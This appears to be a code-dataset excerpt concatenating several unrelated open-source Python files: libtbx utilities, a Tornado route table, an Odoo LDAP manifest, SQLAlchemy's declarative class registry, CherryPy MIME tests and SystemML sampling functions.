new_file_object.write(old_file_object.getvalue())
old_file_object.close()
self.labels[i] = new_label
self.file_objects[i] = new_file_object
self.atexit_send_to[i] = new_atexit_send_to
def isatty(self):
return False
def close(self):
for file_object in self.file_objects:
if (file_object is sys.__stdout__): continue
if (file_object is sys.__stderr__): continue
file_object.close()
self.closed = True
def flush(self):
for file_object in self.file_objects:
flush = getattr(file_object, "flush", None)
if (flush is not None): flush()
def write(self, str):
for file_object in self.file_objects:
file_object.write(str)
def writelines(self, sequence):
for file_object in self.file_objects:
file_object.writelines(sequence)
def write_this_is_auto_generated(f, file_name_generator):
print >> f, """\
/* *****************************************************
THIS IS AN AUTOMATICALLY GENERATED FILE. DO NOT EDIT.
*****************************************************
Generated by:
%s
*/
""" % file_name_generator
class import_python_object:
def __init__(self, import_path, error_prefix, target_must_be, where_str):
path_elements = import_path.split(".")
if (len(path_elements) < 2):
raise ValueError(
'%simport path "%s" is too short%s%s' % (
error_prefix, import_path, target_must_be, where_str))
module_path = ".".join(path_elements[:-1])
try: module = __import__(module_path)
except ImportError:
raise ImportError("%sno module %s%s" % (
error_prefix, module_path, where_str))
for attr in path_elements[1:-1]:
module = getattr(module, attr)
try: self.object = getattr(module, path_elements[-1])
except AttributeError:
raise AttributeError(
'%sobject "%s" not found in module "%s"%s' % (
error_prefix, path_elements[-1], module_path, where_str))
self.path_elements = path_elements
self.module_path = module_path
self.module = module
class input_with_prompt(object):
def __init__(self, prompt, tracebacklimit=0):
try: import readline
except Exception: pass
try: self.previous_tracebacklimit = sys.tracebacklimit
except Exception: self.previous_tracebacklimit = None
if (tracebacklimit is not None):
sys.tracebacklimit = tracebacklimit
self.input = raw_input(prompt)
def __del__(self):
if (self.previous_tracebacklimit is None):
del sys.tracebacklimit
else:
sys.tracebacklimit = self.previous_tracebacklimit
def count_max(assert_less_than):
i = 0
while True:
yield None
i += 1
assert i < assert_less_than
class detect_binary_file(object):
def __init__(self, monitor_initial=None, max_fraction_non_ascii=None):
if (monitor_initial is None):
self.monitor_initial = 1000
else:
self.monitor_initial = monitor_initial
if (max_fraction_non_ascii is None):
self.max_fraction_non_ascii = 0.05
else:
self.max_fraction_non_ascii = max_fraction_non_ascii
self.n_ascii_characters = 0
self.n_non_ascii_characters = 0
self.status = None
def is_binary_file(self, block):
if (self.monitor_initial > 0):
for c in block:
if (1 < ord(c) < 128):
self.n_ascii_characters += 1
else:
self.n_non_ascii_characters += 1
self.monitor_initial -= 1
if (self.monitor_initial == 0):
if ( self.n_non_ascii_characters
> self.n_ascii_characters * self.max_fraction_non_ascii):
self.status = True
else:
self.status = False
break
return self.status
def from_initial_block(
file_name,
monitor_initial=None,
max_fraction_non_ascii=None):
detector = detect_binary_file(
monitor_initial=monitor_initial,
max_fraction_non_ascii=max_fraction_non_ascii)
block = open(file_name, "rb").read(detector.monitor_initial)
if (len(block) == 0): return False
detector.monitor_initial = min(len(block), detector.monitor_initial)
return detector.is_binary_file(block=block)
from_initial_block = staticmethod(from_initial_block)
def search_for(
pattern,
mode,
re_flags=0,
lines=None,
file_name=None):
assert mode in ["==", "find", "startswith", "endswith", "re.search", "re.match"]
assert [lines, file_name].count(None) == 1
if (lines is None):
lines = open(file_name).read().splitlines()
result = []
a = result.append
if (mode == "=="):
for l in lines:
if (l == pattern): a(l)
elif (mode == "startswith"):
for l in lines:
if (l.startswith(pattern)): a(l)
elif (mode == "endswith"):
for l in lines:
if (l.endswith(pattern)): a(l)
elif (mode == "find"):
for l in lines:
if (l.find(pattern) >= 0): a(l)
elif (mode == "re.search"):
import re
for l in lines:
if (re.search(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
else:
import re
for l in lines:
if (re.match(pattern=pattern, string=l, flags=re_flags) is not None):
a(l)
return result
class progress_displayed_as_fraction(object):
def __init__(self, n):
self.n = n
self.i = 0
if self.n == 1: self.advance = lambda: None
self.advance()
def advance(self):
if self.i > 0: sys.stdout.write('\r')
sys.stdout.write("%i / %i" % (self.i, self.n))
sys.stdout.flush()
self.i += 1
def done(self):
if self.n == 1: return
sys.stdout.write("\n")
sys.stdout.flush()
class progress_bar(progress_displayed_as_fraction):
def advance(self):
characters = ['|']
if self.i > 0:
characters.extend(['=']*(self.i-1))
characters.append('>')
characters.extend(' '*(self.n - self.i))
characters.append('|\r')
sys.stdout.write(''.join(characters))
sys.stdout.flush()
self.i += 1
def format_float_with_standard_uncertainty(value, standard_uncertainty):
if standard_uncertainty < 1e-16: return str(value)
precision = -int(round(math.log10(standard_uncertainty)))
if precision > -1:
su = standard_uncertainty * math.pow(10, precision)
if round(su,1) < 2:
su *= 10
precision += 1
fmt_str = "%%.%if(%%i)" %precision
return fmt_str %(value, round(su))
else:
precision += 1
su = int(round(standard_uncertainty, precision))
fmt_str = "%.0f(%i)"
return fmt_str %(round(value, precision), su)
def random_hex_code(number_of_digits):
import random
digits = []
for i_digit in xrange(number_of_digits):
i = random.randrange(16)
digits.append("0123456789abcdef"[i])
return "".join(digits)
def get_svn_revision(path=None):
# adapted from:
# http://code.djangoproject.com/browser/django/trunk/django/utils/version.py
rev = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
entries_path = '%s/.svn/entries' % path
try:
entries = open(entries_path, 'r').read()
except IOError:
pass
else:
# Versions >= 7 of the entries file are flat text. The first line is
# the version number. The next set of digits after 'dir' is the revision.
if re.match('(\d+)', entries):
rev_match = re.search('\d+\s+dir\s+(\d+)', entries)
if rev_match:
rev = int(rev_match.groups()[0])
return rev
def get_build_tag(path=None):
tag = None
if path is None:
import libtbx.load_env
path = op.dirname(libtbx.env.dist_path(module_name="libtbx"))
tag_file_path = "%s/TAG" %path
if op.exists(tag_file_path):
tag = open(tag_file_path).readline().strip()
return tag
def getcwd_safe () :
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
raise Sorry("Could not determine the current working directory because "+
"it has been deleted or unmounted.")
else :
raise e
return cwd
def getcwd_or_default (default=None) :
if (default is None) :
if (os.name == "nt") :
home_drive = os.environ.get("HOMEDRIVE", "C:")
home_dir = os.environ.get("HOMEPATH", "\\")
default = home_drive + home_dir
else :
default = os.environ.get("HOME", "/")
try :
cwd = os.getcwd()
except OSError, e :
if (e.errno == 2) :
cwd = default
else :
raise e
return cwd
def create_run_directory (prefix, default_directory_number=None) :
"""
Create a program output directory using sequential numbering, picking the
highest run ID. In other words, if the prefix is 'Refine' and the current
directory contains subdirectories named Refine_2 and Refine_9, the new
directory will be Refine_10.
"""
dir_number = default_directory_number
if (dir_number is None) :
dir_ids = []
for file_name in os.listdir(os.getcwd()) :
if (os.path.isdir(file_name)) and (file_name.startswith(prefix)) :
dir_id = file_name.split("_")[-1]
if (dir_id.isdigit()) :
dir_ids.append(int(dir_id))
if (len(dir_ids) > 0) :
dir_number = max(max(dir_ids) + 1, 1)
else :
dir_number = 1
dir_name = prefix + "_" + str(dir_number)
if (os.path.isdir(dir_name)) :
raise OSError("The directory %s already exists."%os.path.abspath(dir_name))
else :
os.makedirs(dir_name)
return os.path.abspath(dir_name)
class tmp_dir_wrapper (object) :
"""
Convenience methods for running in a (presumably empty) temporary directory
and copying all files to another directory. Can be used whether or not the
temporary directory is actually defined; if None, no action will be taken.
Otherwise, both tmp_dir and dest_dir (default is current directory) must be
existing paths.
"""
def __init__ (self, tmp_dir, dest_dir=None, out=sys.stdout) :
if (dest_dir is None) :
dest_dir = os.getcwd()
self.tmp_dir = tmp_dir
self.dest_dir = dest_dir
if (tmp_dir is None) :
pass
elif (not os.path.isdir(tmp_dir)) :
raise Sorry("The temporary directory %s does not exist." % tmp_dir)
else :
if (not os.path.isdir(dest_dir)) :
raise Sorry("The destination directory %s does not exist." % dest_dir)
print >> out, "Changing working directory to %s" % tmp_dir
print >> out, "Ultimate destination is %s" % dest_dir
os.chdir(tmp_dir)
def transfer_files (self, out=sys.stdout) :
if (self.tmp_dir is None) : return False
assert os.path.isdir(self.dest_dir)
files = os.listdir(self.tmp_dir)
print >> out, "Copying all output files to %s" % self.dest_dir
for file_name in files :
print >> out, " ... %s" % file_name
shutil.copy(os.path.join(self.tmp_dir, file_name), self.dest_dir)
print >> out, ""
return True
def show_development_warning (out=sys.stdout) :
print >> out, """
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!! WARNING - EXPERIMENTAL PROGRAM !!
!! !!
!! This program is still in development - some functionality may be !!
!! missing and/or untested. Use at your own risk! For bug reports, etc. !!
!! email [email protected]. !!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
"""
def check_if_output_directory_exists (file_name=None, dir_name=None) :
if (file_name is not None) :
assert (dir_name is None)
dir_name = os.path.dirname(file_name)
if (dir_name == "") : return
if (dir_name is None) :
raise Sorry("No output directory specified.")
if (not op.isdir(dir_name)) :
raise Sorry(("The specified output directory (%s) does not exist or "+
"is not a directory.") % dir_name)
else :
# XXX writing to Dropbox folders is generally not a good idea
head, tail = os.path.split(dir_name)
while tail != "" :
if (tail == "Dropbox") :
warnings.warn("You are directing output to a Dropbox directory. "+
"Please note that this is not guaranteed to work in all cases; "+
"use at your own risk.", UserWarning)
head, tail = os.path.split(head)
def concatenate_python_script (out, file_name) :
"""
Insert a Python script into an existing file, removing any __future__
import to prevent syntax errors. (This could be dangerous in most contexts
but is required for some of our Coot-related scripts to work.)
"""
data = open(file_name, "r").read()
print >> out, ""
print >> out, "#--- script copied from %s" % os.path.basename(file_name)
for line in data.splitlines() :
if line.startswith("from __future__") :
continue
else :
print >> out, line
print >> out, "#--- end"
print >> out, ""
def greek_time(secs):
for greek in ["","milli", "micro", "nano"]:
if secs>1:
break
secs*=1000
return secs, greek
###########################
# URL retrieval functions #
###########################
libtbx_urllib_proxy = None
def install_urllib_http_proxy (server, port=80, user=None, password=None) :
global libtbx_urllib_proxy
import urllib2
if (user is None) :
proxy = urllib2.ProxyHandler({'http': '%s:%d' % (server, port) })
opener = urllib2.build_opener(proxy)
else :
proxy = urllib2.ProxyHandler({
'http': 'http://%s:%s@%s:%s' % (user, password, server, port),
})
auth = urllib2.HTTPBasicAuthHandler()
opener = urllib2.build_opener(proxy, auth, urllib2.HTTPHandler)
libtbx_urllib_proxy = proxy
urllib2.install_opener(opener)
print "Installed urllib2 proxy at %s:%d" % (server, port)
return proxy
def urlopen (*args, **kwds) :
"""
Substitute for urllib2.urlopen, with automatic HTTP proxy configuration
if specific environment variables are defined.
"""
if ("CCTBX_HTTP_PROXY" in os.environ) and (libtbx_urllib_proxy is None) :
server = os.environ["CCTBX_HTTP_PROXY_SERVER"]
port = os.environ.get("CCTBX_HTTP_PROXY_PORT", 80)
user = os.environ.get("CCTBX_HTTP_PROXY_USER", None)
passwd = os.environ.get("CCTBX_HTTP_PROXY_PASSWORD", None)
if (user is not None) and (password is None) :
raise Sorry("You have defined a user name for the HTTP proxy, but "+
"no password was specified. Please set the environment variable "+
"CCTBX_HTTP_PROXY_PASSWORD.")
install_urllib_http_proxy(
server=server,
port=port,
user=user,
password=password)
import urllib2
return urllib2.urlopen(*args, **kwds)
class download_progress (object) :
"""
Simple proxy for displaying download status - here with methods for
writing to the console, but can be subclassed and used for graphical display.
"""
def __init__ (self, log=None, n_kb_total=None) :
if (log is None) :
log = null_out()
self.log = log
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def set_total_size (self, n_kb_total) :
self.n_kb_total = n_kb_total
self.n_kb_elapsed = 0
def increment (self, n_kb) :
assert (self.n_kb_total is not None)
self.n_kb_elapsed += n_kb
return self.show_progress()
def show_progress (self) :
self.log.write("\r%d/%d KB downloaded" % (self.n_kb_elapsed,
self.n_kb_total))
self.log.flush()
return True
def percent_finished (self) :
assert (self.n_kb_total is not None)
return 100 * min(1.0, self.n_kb_elapsed / self.n_kb_total)
def complete (self) :
self.log.write("\rDownload complete")
def run_continuously (self) :
"""
Placeholder for cases where the download is not being run asynchronously.
"""
pass
class download_target (object) :
"""
Flexible callable object for retrieving a file from a URL, with optional
HTTPS authentication. Designed to be runnable in a separate thread with
graphical progress update.
Note that in some circumstances SSL support may be missing from the socket
module, in which case we use 'curl' to download securely. (This will not
work on Windows, obviously.)
"""
def __init__ (self,
url,
file_name,
use_curl=None, # SSL only
user=None, # SSL only
password=None, # SSL only
base_url=None) : # SSL only
self.url = url
self.file_name = file_name
self.use_curl = use_curl
self.user = user
self.password = password
self.base_url = base_url
if (not None in [self.user, self.password]) :
assert (self.base_url is not None)
import socket
if ((not self.use_curl) and (hasattr(socket, "ssl")) and
(hasattr(socket.ssl, "__call__"))) :
self.use_curl = False
else :
self.use_curl = True
def __call__ (self, log=None, progress_meter=None) :
if (log is None) :
log = null_out()
if (progress_meter is None) :
progress_meter = download_progress(log=log)
from libtbx import easy_run
import urllib2
file_name = self.file_name # return value
if (not self.use_curl) :
if (not None in [self.user, self.password]) :
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, self.base_url, params.user, params.password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
req = urllib2.urlopen(self.url)
info = req.info()
n_kb_total = int(info['Content-length']) / 1024
progress_meter.set_total_size(n_kb_total)
# TODO adjust chunk size automatically based on download speed
n_kb_chunk = getattr(self, "n_kb_chunk", 512)
chunksize = n_kb_chunk * 1024
fp = open(self.file_name, 'wb')
while True:
chunk = req.read(chunksize)
if not chunk: break
if not progress_meter.increment(n_kb_chunk) :
file_name = None
break
fp.write(chunk)
fp.close()
progress_meter.complete()
else :
progress_meter.run_continuously()
if (not None in [self.user, self.password]) :
curl_args = "--user %s:%s" % (self.user, self.password)
rc = easy_run.call("curl %s \"%s\" -o %s" % (curl_args, self.url,
self.file_name))
progress_meter.complete()
if (rc != 0) :
raise RuntimeError("curl exited with code %d" % rc)
if (file_name is None) :
return None
return op.abspath(self.file_name)
| mit | 215,904,346,378,941,440 | 29.949574 | 82 | 0.625055 | false |
ptphp/PyLib | src/tornado/demos/Vulpix-master/handlers.py | 2 | 1560 | # -*- coding: utf-8 -*-
# AUTHOR: Zeray Rice <[email protected]>
# FILE: handlers.py
# CREATED: 01:41:06 08/03/2012
# MODIFIED: 20:28:26 18/04/2012
# DESCRIPTION: URL Route
from api import *
from home import *
from lang import *
from forum import *
from member import *
from problem import *
from contest import *
from backstage import *
'''
'' Handler ๅฝๅ่ง่๏ผ [ๅจๅฎพ็ปๆ / ๅ่ฏ] + Handler
'''
handlers = [
(r'/', HomeHandler),
(r'/signin', SigninHandler),
(r'/signup', SignupHandler),
(r'/signout', SignoutHandler),
(r'/settings', SettingsHandler),
(r'/settings/changepass', ChangePasswordHandler),
(r'/member', ListMemberHandler),
(r'/member/(.*)', MemberHandler),
(r'/lang/(.*)', SetLanguageHandler),
(r'/problem', ListProblemHandler),
(r'/problem/([\d]*)', ViewProblemHandler),
(r'/tag/(.*)', ViewTagHandler),
(r'/submit', ListSubmitHandler),
(r'/submit/(.*)', ViewSubmitHandler),
(r'/backstage/problem/add', AddProblemHandler),
(r'/backstage/contest/add', AddContestHandler),
(r'/backstage/node/add', AddNodeHandler),
(r'/backstage/judger', ManageJudgerHandler),
(r'/backstage/judger/add', AddJudgerHandler),
(r'/contest', ListContestHandlder),
(r'/contest/([\d]*)', ViewContestHandler),
(r'/go/(.*)', ViewNodeHandler),
(r'/t/([\d]*)', ViewTopicHandler),
(r'/new/(.*)', CreateTopicHandler),
(r'/forum', ViewForumHandler),
(r'/test', TestHandler),
(r'/api/problem/get/([\d]*)', GetProblemHandler),
]
| apache-2.0 | 5,842,432,996,212,796,000 | 30.387755 | 54 | 0.623537 | false |
nhomar/odoo-mirror | addons/auth_ldap/__openerp__.py | 50 | 1567 | ##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name' : 'Authentication via LDAP',
'version' : '1.0',
'depends' : ['base'],
'images' : ['images/ldap_configuration.jpeg'],
'author' : 'OpenERP SA',
#'description': < auto-loaded from README file
'website' : 'https://www.odoo.com',
'category' : 'Authentication',
'data' : [
'users_ldap_view.xml',
'user_ldap_installer.xml',
'security/ir.model.access.csv',
],
'auto_install': False,
'installable': True,
'external_dependencies' : {
'python' : ['ldap'],
}
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 3,194,602,147,659,977,700 | 37.219512 | 78 | 0.590938 | false |
mitsuhiko/sqlalchemy | lib/sqlalchemy/ext/declarative/clsregistry.py | 6 | 9816 | # ext/declarative/clsregistry.py
# Copyright (C) 2005-2013 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Routines to handle the string class registry used by declarative.
This system allows specification of classes and expressions used in
:func:`.relationship` using strings.
"""
from ...orm.properties import ColumnProperty, RelationshipProperty, \
SynonymProperty
from ...schema import _get_table_key
from ...orm import class_mapper, interfaces
from ... import util
from ... import exc
import weakref
# strong references to registries which we place in
# the _decl_class_registry, which is usually weak referencing.
# the internal registries here link to classes with weakrefs and remove
# themselves when all references to contained classes are removed.
_registries = set()
def add_class(classname, cls):
"""Add a class to the _decl_class_registry associated with the
given declarative class.
"""
if classname in cls._decl_class_registry:
# class already exists.
existing = cls._decl_class_registry[classname]
if not isinstance(existing, _MultipleClassMarker):
existing = \
cls._decl_class_registry[classname] = \
_MultipleClassMarker([cls, existing])
else:
cls._decl_class_registry[classname] = cls
try:
root_module = cls._decl_class_registry['_sa_module_registry']
except KeyError:
cls._decl_class_registry['_sa_module_registry'] = \
root_module = _ModuleMarker('_sa_module_registry', None)
tokens = cls.__module__.split(".")
# build up a tree like this:
# modulename: myapp.snacks.nuts
#
# myapp->snack->nuts->(classes)
# snack->nuts->(classes)
# nuts->(classes)
#
# this allows partial token paths to be used.
while tokens:
token = tokens.pop(0)
module = root_module.get_module(token)
for token in tokens:
module = module.get_module(token)
module.add_class(classname, cls)
class _MultipleClassMarker(object):
"""refers to multiple classes of the same name
within _decl_class_registry.
"""
def __init__(self, classes, on_remove=None):
self.on_remove = on_remove
self.contents = set([
weakref.ref(item, self._remove_item) for item in classes])
_registries.add(self)
def __iter__(self):
return (ref() for ref in self.contents)
def attempt_get(self, path, key):
if len(self.contents) > 1:
raise exc.InvalidRequestError(
"Multiple classes found for path \"%s\" "
"in the registry of this declarative "
"base. Please use a fully module-qualified path." %
(".".join(path + [key]))
)
else:
ref = list(self.contents)[0]
cls = ref()
if cls is None:
raise NameError(key)
return cls
def _remove_item(self, ref):
self.contents.remove(ref)
if not self.contents:
_registries.discard(self)
if self.on_remove:
self.on_remove()
def add_item(self, item):
modules = set([cls().__module__ for cls in self.contents])
if item.__module__ in modules:
util.warn(
"This declarative base already contains a class with the "
"same class name and module name as %s.%s, and will "
"be replaced in the string-lookup table." % (
item.__module__,
item.__name__
)
)
self.contents.add(weakref.ref(item, self._remove_item))
class _ModuleMarker(object):
""""refers to a module name within
_decl_class_registry.
"""
def __init__(self, name, parent):
self.parent = parent
self.name = name
self.contents = {}
self.mod_ns = _ModNS(self)
if self.parent:
self.path = self.parent.path + [self.name]
else:
self.path = []
_registries.add(self)
def __contains__(self, name):
return name in self.contents
def __getitem__(self, name):
return self.contents[name]
def _remove_item(self, name):
self.contents.pop(name, None)
if not self.contents and self.parent is not None:
self.parent._remove_item(self.name)
_registries.discard(self)
def resolve_attr(self, key):
return getattr(self.mod_ns, key)
def get_module(self, name):
if name not in self.contents:
marker = _ModuleMarker(name, self)
self.contents[name] = marker
else:
marker = self.contents[name]
return marker
def add_class(self, name, cls):
if name in self.contents:
existing = self.contents[name]
existing.add_item(cls)
else:
existing = self.contents[name] = \
_MultipleClassMarker([cls],
on_remove=lambda: self._remove_item(name))
class _ModNS(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
try:
value = self.__parent.contents[key]
except KeyError:
pass
else:
if value is not None:
if isinstance(value, _ModuleMarker):
return value.mod_ns
else:
assert isinstance(value, _MultipleClassMarker)
return value.attempt_get(self.__parent.path, key)
raise AttributeError("Module %r has no mapped classes "
"registered under the name %r" % (self.__parent.name, key))
class _GetColumns(object):
def __init__(self, cls):
self.cls = cls
def __getattr__(self, key):
mp = class_mapper(self.cls, configure=False)
if mp:
if key not in mp.all_orm_descriptors:
raise exc.InvalidRequestError(
"Class %r does not have a mapped column named %r"
% (self.cls, key))
desc = mp.all_orm_descriptors[key]
if desc.extension_type is interfaces.NOT_EXTENSION:
prop = desc.property
if isinstance(prop, SynonymProperty):
key = prop.name
elif not isinstance(prop, ColumnProperty):
raise exc.InvalidRequestError(
"Property %r is not an instance of"
" ColumnProperty (i.e. does not correspond"
" directly to a Column)." % key)
return getattr(self.cls, key)
class _GetTable(object):
def __init__(self, key, metadata):
self.key = key
self.metadata = metadata
def __getattr__(self, key):
return self.metadata.tables[
_get_table_key(key, self.key)
]
def _determine_container(key, value):
if isinstance(value, _MultipleClassMarker):
value = value.attempt_get([], key)
return _GetColumns(value)
def _resolver(cls, prop):
def resolve_arg(arg):
import sqlalchemy
from sqlalchemy.orm import foreign, remote
fallback = sqlalchemy.__dict__.copy()
fallback.update({'foreign': foreign, 'remote': remote})
def access_cls(key):
if key in cls._decl_class_registry:
return _determine_container(key, cls._decl_class_registry[key])
elif key in cls.metadata.tables:
return cls.metadata.tables[key]
elif key in cls.metadata._schemas:
return _GetTable(key, cls.metadata)
elif '_sa_module_registry' in cls._decl_class_registry and \
key in cls._decl_class_registry['_sa_module_registry']:
registry = cls._decl_class_registry['_sa_module_registry']
return registry.resolve_attr(key)
else:
return fallback[key]
d = util.PopulateDict(access_cls)
def return_cls():
try:
x = eval(arg, globals(), d)
if isinstance(x, _GetColumns):
return x.cls
else:
return x
except NameError as n:
raise exc.InvalidRequestError(
"When initializing mapper %s, expression %r failed to "
"locate a name (%r). If this is a class name, consider "
"adding this relationship() to the %r class after "
"both dependent classes have been defined." %
(prop.parent, arg, n.args[0], cls)
)
return return_cls
return resolve_arg
def _deferred_relationship(cls, prop):
if isinstance(prop, RelationshipProperty):
resolve_arg = _resolver(cls, prop)
for attr in ('argument', 'order_by', 'primaryjoin', 'secondaryjoin',
'secondary', '_user_defined_foreign_keys', 'remote_side'):
v = getattr(prop, attr)
if isinstance(v, str):
setattr(prop, attr, resolve_arg(v))
if prop.backref and isinstance(prop.backref, tuple):
key, kwargs = prop.backref
for attr in ('primaryjoin', 'secondaryjoin', 'secondary',
'foreign_keys', 'remote_side', 'order_by'):
if attr in kwargs and isinstance(kwargs[attr], str):
kwargs[attr] = resolve_arg(kwargs[attr])
return prop
| mit | -4,564,434,234,913,575,000 | 32.848276 | 84 | 0.561532 | false |
CeltonMcGrath/TACTIC | 3rd_party/CherryPy/cherrypy/test/test_mime.py | 6 | 3459 | """Tests for various MIME issues, including the safe_multipart Tool."""
from cherrypy.test import test
test.prefer_parent_path()
import cherrypy
def setup_server():
class Root:
def multipart(self, parts):
return repr(parts)
multipart.exposed = True
def flashupload(self, Filedata, Upload, Filename):
return ("Upload: %r, Filename: %r, Filedata: %r" %
(Upload, Filename, Filedata.file.read()))
flashupload.exposed = True
cherrypy.config.update({'server.max_request_body_size': 0})
cherrypy.tree.mount(Root())
# Client-side code #
from cherrypy.test import helper
class MultipartTest(helper.CPWebCase):
def test_multipart(self):
text_part = u"This is the text version"
html_part = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
This is the <strong>HTML</strong> version
</body>
</html>
"""
body = '\r\n'.join([
"--123456789",
"Content-Type: text/plain; charset='ISO-8859-1'",
"Content-Transfer-Encoding: 7bit",
"",
text_part,
"--123456789",
"Content-Type: text/html; charset='ISO-8859-1'",
"",
html_part,
"--123456789--"])
headers = [
('Content-Type', 'multipart/mixed; boundary=123456789'),
('Content-Length', len(body)),
]
self.getPage('/multipart', headers, "POST", body)
self.assertBody(repr([text_part, html_part]))
class SafeMultipartHandlingTest(helper.CPWebCase):
def test_Flash_Upload(self):
headers = [
('Accept', 'text/*'),
('Content-Type', 'multipart/form-data; '
'boundary=----------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6'),
('User-Agent', 'Shockwave Flash'),
('Host', 'www.example.com:8080'),
('Content-Length', '499'),
('Connection', 'Keep-Alive'),
('Cache-Control', 'no-cache'),
]
filedata = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<projectDescription>\r\n'
'</projectDescription>\r\n')
body = (
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Filename"\r\n'
'\r\n'
'.project\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; '
'name="Filedata"; filename=".project"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
+ filedata +
'\r\n'
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6\r\n'
'Content-Disposition: form-data; name="Upload"\r\n'
'\r\n'
'Submit Query\r\n'
# Flash apps omit the trailing \r\n on the last line:
'------------KM7Ij5cH2KM7Ef1gL6ae0ae0cH2gL6--'
)
self.getPage('/flashupload', headers, "POST", body)
self.assertBody("Upload: u'Submit Query', Filename: u'.project', "
"Filedata: %r" % filedata)
if __name__ == '__main__':
helper.testmain()
| epl-1.0 | 4,094,526,645,165,832,000 | 31.942857 | 87 | 0.52096 | false |
asurve/incubator-systemml | src/main/python/systemml/random/sampling.py | 13 | 5293 | #-------------------------------------------------------------
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#-------------------------------------------------------------
__all__ = ['normal', 'uniform', 'poisson']
from ..defmatrix import *
# Special object used internally to specify the placeholder which will be replaced by output ID
# This helps to provide dml containing output ID in constructSamplingNode
OUTPUT_ID = '$$OutputID$$'
def constructSamplingNode(inputs, dml):
"""
Convenient utility to create an intermediate of AST.
Parameters
----------
inputs = list of input matrix objects and/or DMLOp
dml = list of DML string (which will be eventually joined before execution). To specify out.ID, please use the placeholder
"""
dmlOp = DMLOp(inputs)
out = matrix(None, op=dmlOp)
dmlOp.dml = [out.ID if x==OUTPUT_ID else x for x in dml]
return out
INPUTS = []
def asStr(arg):
"""
Internal use only: Convenient utility to update inputs and return appropriate string value
"""
if isinstance(arg, matrix):
INPUTS = INPUTS + [ arg ]
return arg.ID
else:
return str(arg)
def normal(loc=0.0, scale=1.0, size=(1,1), sparsity=1.0):
"""
Draw random samples from a normal (Gaussian) distribution.
Parameters
----------
loc: Mean ("centre") of the distribution.
scale: Standard deviation (spread or "width") of the distribution.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.normal(loc=3, scale=2, size=(3,3))
>>> m1.toNumPy()
array([[ 3.48857226, 6.17261819, 2.51167259],
[ 3.60506708, -1.90266305, 3.97601633],
[ 3.62245706, 5.9430881 , 2.53070413]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
loc = asStr(loc)
scale = asStr(scale)
sparsity = asStr(sparsity)
# loc + scale*standard normal
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = ', loc,' + ', scale,' * random.normal(', rows, ',', cols, ',', sparsity, ')\n'])
def uniform(low=0.0, high=1.0, size=(1,1), sparsity=1.0):
"""
Draw samples from a uniform distribution.
Parameters
----------
low: Lower boundary of the output interval.
high: Upper boundary of the output interval.
size: Output shape (only tuple of length 2, i.e. (m, n), supported).
sparsity: Sparsity (between 0.0 and 1.0).
Examples
--------
>>> import systemml as sml
>>> import numpy as np
>>> sml.setSparkContext(sc)
>>> from systemml import random
>>> m1 = sml.random.uniform(size=(3,3))
>>> m1.toNumPy()
array([[ 0.54511396, 0.11937437, 0.72975775],
[ 0.14135946, 0.01944448, 0.52544478],
[ 0.67582422, 0.87068849, 0.02766852]])
"""
if len(size) != 2:
raise TypeError('Incorrect type for size. Expected tuple of length 2')
INPUTS = []
rows = asStr(size[0])
cols = asStr(size[1])
low = asStr(low)
high = asStr(high)
sparsity = asStr(sparsity)
return constructSamplingNode(INPUTS, [OUTPUT_ID, ' = random.uniform(', rows, ',', cols, ',', sparsity, ',', low, ',', high, ')\n'])
